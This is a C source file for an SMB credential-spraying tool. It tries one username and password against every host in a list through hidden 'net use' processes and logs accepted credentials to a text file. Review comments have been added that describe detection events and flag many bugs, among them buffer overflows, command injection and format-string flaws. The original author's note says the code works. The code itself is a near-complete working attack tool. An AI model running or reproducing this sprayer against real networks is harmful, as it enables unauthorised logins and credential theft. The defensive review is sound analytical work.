// Review summary (code below is unchanged apart from layout and comments).
//
// What it does: takes a host-list file, a username and a password on the command
// line. For every line of the list it starts a hidden `cmd.exe /c net use` child
// against <host>\ipc$ with that one credential pair and reads the child's output
// through an anonymous pipe. When the output contains "successfully" it records
// host, username and password in suscess.txt and removes the connection again.
//
// Defensive view: one credential pair tried against many hosts is the pattern of
// credential spraying over SMB. Every attempt spawns a process whose command line
// carries the password in clear text, so process-creation auditing with
// command-line capture (Security event 4688, Sysmon event 1) records it. Target
// hosts see network logons (type 3) succeed (4624) or fail (4625) from one source
// in quick succession. suscess.txt in the working directory is a plain-text
// artifact holding every accepted credential.
//
// Code-quality findings are marked NOTE(review) next to the line they concern.
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <stdlib.h>

// Arguments handed from main() to the worker thread. All three fields are fixed
// MAX_PATH-sized buffers filled from argv without a length check (see main).
struct ThreadParameter{
    char Filename[MAX_PATH];    // path of the host-list file (argv[1])
    char szusername[MAX_PATH];  // account name tried on every host (argv[2])
    char szpassword[MAX_PATH];  // password tried on every host (argv[3])
};

// Worker: iterates over the host list and runs one `net use` attempt per line.
// pParam must point to a ThreadParameter. Returns true when the list was
// processed, false on the failure paths marked below.
// NOTE(review): main() casts this function to LPTHREAD_START_ROUTINE, which
// declares DWORD WINAPI f(LPVOID). This signature (bool, default calling
// convention) does not match; the cast hides the mismatch.
bool LoginCompter(LPVOID pParam)
{
    FILE* fp;
    FILE* ffp;
    char readbuffer[1024],savebuffer[120];
    ThreadParameter *tp = (ThreadParameter *)pParam;
    char cmd[MAX_PATH];
    char delcmd[MAX_PATH];
    char Buffer[4096];
    STARTUPINFO sInfo,info;   // NOTE(review): `info` is never used
    PROCESS_INFORMATION pInfo;
    SECURITY_ATTRIBUTES sa;
    HANDLE hRead,hWrite;
    DWORD bytesRead;

    // Both pipe ends are created inheritable so the child can use the write end.
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;

    fp = fopen(tp->Filename,"rb");
    if (fp == NULL)
    {
        printf("Open file in error.\r\n");
        // NOTE(review): fp is NULL here; fclose(NULL) is undefined behaviour.
        fclose(fp);
        return 0;
    }
    ffp = fopen("suscess.txt","a+");
    if (ffp == NULL)
    {
        printf("save fopen file error.\r\n");
        // NOTE(review): fclose(NULL) again, fp is leaked, and -1 converts to
        // `true` in a bool function, so this failure is reported as success.
        fclose(ffp);
        return -1;
    }
    memset(readbuffer,0,sizeof(readbuffer));
    while (fgets(readbuffer,sizeof(readbuffer),fp))
    {
        if (!CreatePipe(&hRead,&hWrite,&sa,0)) // create the anonymous pipe
        {
            // NOTE(review): returns without closing fp and ffp.
            printf("CreatePipe failed (%d)!\n", GetLastError());
            return false;
        }
        GetStartupInfo(&sInfo);
        sInfo.cb = sizeof(sInfo);
        sInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        sInfo.wShowWindow = SW_HIDE;   // child window is hidden
        sInfo.hStdError = hWrite; // hand the pipe's write end to the child process
        sInfo.hStdOutput = hWrite;
        memset(&pInfo, 0, sizeof(pInfo));
        int len = strlen(readbuffer);
        // Strips the line ending. Assumes every line ends in "\r\n" (the file is
        // opened in binary mode, so '\r' is kept).
        // NOTE(review): a line that is only "\n" gives len == 1 and writes to
        // readbuffer[-1], outside the array.
        // NOTE(review): the quote characters below are typographic, presumably a
        // page-rendering artifact; as shown the character literals do not compile.
        if (readbuffer[len-1] == ‘\n‘)
        {
            readbuffer[len -2] = ‘\0‘;
        }
        memset(cmd,0,sizeof(cmd));
        memset(delcmd,0,sizeof(delcmd));
        // memset(savebuffer,0,sizeof(savebuffer));
        // NOTE(review): cmd holds MAX_PATH bytes, but readbuffer alone can carry
        // up to 1023 characters and the two credential fields up to MAX_PATH each;
        // the unbounded sprintf can overflow the stack buffer.
        // NOTE(review): the list line is pasted unquoted into a `cmd.exe /c`
        // command line, so shell metacharacters in the input file are interpreted
        // by cmd.exe (command injection from the list file).
        // NOTE(review): the password is passed as a command-line argument and is
        // visible to anything that can read process command lines.
        sprintf(cmd,"cmd.exe /c net use %s\\ipc$ %s /u:%s",readbuffer,tp->szpassword,tp->szusername);
        // NOTE(review): sInfo is a STARTUPINFO filled by GetStartupInfo; the cast
        // to LPSTARTUPINFOA only matches in a non-UNICODE build — confirm.
        // bInheritHandles is TRUE, so the child also inherits the read end.
        if(!CreateProcessA(NULL, cmd , NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA)&sInfo, &pInfo)) // create the child process
        {
            // NOTE(review): fp and ffp stay open on this path.
            printf("CreateProcess failed (%d)!\n", GetLastError());
            CloseHandle(hWrite);
            CloseHandle(hRead);
            return false;
        }
        CloseHandle(hWrite); // close the parent's copy of the write end
        // Drain the child's output; the loop ends once a read yields <= 2 bytes.
        // NOTE(review): hRead, pInfo.hProcess and pInfo.hThread are not closed
        // inside the host loop, so handles accumulate with every list entry.
        while (1)
        {
            memset(Buffer,0,sizeof(Buffer));
            // NOTE(review): ReadFile's return value is ignored, and a read that
            // fills all sizeof(Buffer) bytes leaves no terminating NUL for strstr.
            ReadFile(hRead,Buffer,sizeof(Buffer),&bytesRead,NULL);
            if (bytesRead <= 2)
            {
                break;
            }
            if (strstr(Buffer,"successfully"))
            {
                memset(savebuffer,0,sizeof(savebuffer));
                // NOTE(review): savebuffer is 120 bytes while host, username and
                // password together can be far longer: stack buffer overflow.
                sprintf(savebuffer,"Host:%s Username:%s Passwords:%s suscess",readbuffer,tp->szusername,tp->szpassword);
                // NOTE(review): non-literal format string; '%' sequences in the
                // host, username or password are interpreted by printf.
                printf(savebuffer);
                printf("\r\n");
                // Always writes all 120 bytes, including the NUL padding, and
                // stores the credential in plain text.
                fwrite(savebuffer,120,1,ffp);
                fwrite("\r\n",2,1,ffp);
                // NOTE(review): same overflow and injection concerns as `cmd`;
                // system() hands the string to the command interpreter.
                sprintf(delcmd,"cmd.exe /c net use %s\\ipc$ /del",readbuffer);
                system(delcmd);
            }
        }
    }
    fclose(fp);
    fclose(ffp);
    // Original comment: "wait for the thread to exit". The handle waited on is the
    // process handle of the last child only.
    // NOTE(review): pInfo and hRead are uninitialised here if the list file
    // contained no lines, because both are set only inside the loop.
    WaitForSingleObject(pInfo.hProcess, INFINITE);
    CloseHandle(hRead); // close the handle
    return true;
}

// Entry point: expects <host-list file> <username> <password>, copies them into
// a ThreadParameter, runs LoginCompter on a new thread and waits for it.
int main(int argc,char* argv[])
{
    ThreadParameter tp;
    HANDLE threadhandle;
    if (argc < 4)
    {
        printf("[-]:%s Compute_list Username Password\r\n",argv[0]);
        return -1;
    }
    // NOTE(review): unbounded strcpy into MAX_PATH-sized fields; an argument
    // longer than MAX_PATH - 1 characters overflows the struct on the stack.
    strcpy(tp.Filename,argv[1]);
    strcpy(tp.szusername,argv[2]);
    strcpy(tp.szpassword,argv[3]);
    threadhandle = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)LoginCompter,&tp,0,0);
    // NOTE(review): CreateThread reports failure by returning NULL, not
    // INVALID_HANDLE_VALUE, so this check does not catch a failed call.
    if (threadhandle == INVALID_HANDLE_VALUE)
    {
        printf("Create Thread error :%d \r\n",GetLastError());
        return -1;
    }
    WaitForSingleObject(threadhandle,INFINITE);
    CloseHandle(threadhandle);
    return 0;
}
代码写得很弱,但是能用。如果你对这段代码抱有强烈的批评意见,甚至到了觉得恶心的地步,还请指出来,我会虚心接受批评。
时间: 2024-08-14 00:22:45